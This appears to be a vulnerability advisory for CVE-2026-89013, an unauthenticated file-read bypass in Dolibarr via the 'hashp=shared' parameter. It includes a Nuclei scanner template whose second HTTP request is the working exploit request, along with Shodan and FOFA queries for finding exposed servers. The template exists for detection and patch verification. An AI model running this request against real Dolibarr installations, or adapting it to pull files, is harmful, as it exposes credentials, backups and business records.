CVE-2026-89013: Dolibarr < 24.0.0 - Authorization Bypass via hashp Parameter

2026-09-28 Unknown PoC Public

Description

Dolibarr ERP/CRM versions 23.0.4 through 24.0.0 contain an authorization bypass vulnerability in document.php and viewimage.php. The public share-link feature forces NOLOGIN when hashp is present, but the value 'shared' skips token resolution while the override still fires for any non-empty hashp value. This bypass allows unauthenticated remote attackers to read arbitrary files from all Dolibarr managed directories including logs, SQL database backups, invoices, contracts, user vcards, and custom module sources.

PoC

id: CVE-2026-89013

info:
  name: Dolibarr < 24.0.0 - Authorization Bypass via hashp Parameter
  author: DhiyaneshDk
  severity: high
  description: |
    Dolibarr ERP/CRM versions 23.0.4 through 24.0.0 contain an authorization bypass vulnerability in document.php and viewimage.php. The public share-link feature forces NOLOGIN when hashp is present, but the value 'shared' skips token resolution while the override still fires for any non-empty hashp value. This bypass allows unauthenticated remote attackers to read arbitrary files from all Dolibarr managed directories including logs, SQL database backups, invoices, contracts, user vcards, and custom module sources.
  impact: |
    Unauthenticated remote attackers can read arbitrary files from all Dolibarr managed directories, potentially exposing database credentials, invoices, contracts, and other sensitive data.
  remediation: |
    Upgrade Dolibarr to version 24.0.1 or later.
  reference:
    - https://github.com/Faceless0x7/CVE-2026-89013
    - https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
    - https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
    - https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
    - https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
    - https://www.vulncheck.com/advisories/dolibarr-authorization-bypass-via-hashp-parameter-in-document-php
    - https://previdian.com/CVE-2026-89013
    - http://nvd.nist.gov/vuln/detail/CVE-2026-89013
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-89013
    cwe-id: CWE-863
  metadata:
    verified: true
    max-request: 2
    vendor: dolibarr
    product: dolibarr
    shodan-query: http.title:"Dolibarr"
    fofa-query: app="Dolibarr"
  tags: cve,cve2026,dolibarr,auth-bypass,file-read,kev,vkev

variables:
  canary: "{{rand_text_alpha(16)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'contains(body, "Dolibarr") || contains(body, "main_login") || contains(body, "dol_login")'
          - 'status_code == 200'
        condition: and

  - raw:
      - |
        GET /document.php?hashp=shared&modulepart=medias&file={{canary}}.canary HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{canary}}")'
          - '!contains_any(body, "Bad value for parameter hashp", "Missing identification to find file", "main_login")'
        condition: and
# digest: 4b0a004830460221008da88496ed1644409fcafde45b22dc703d0002708e117a8da0102efe0b42e15202210099b33c03b7fb74504d868d47a8cdd4f3a5bae992ac90cff22f6b0128b925c522:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.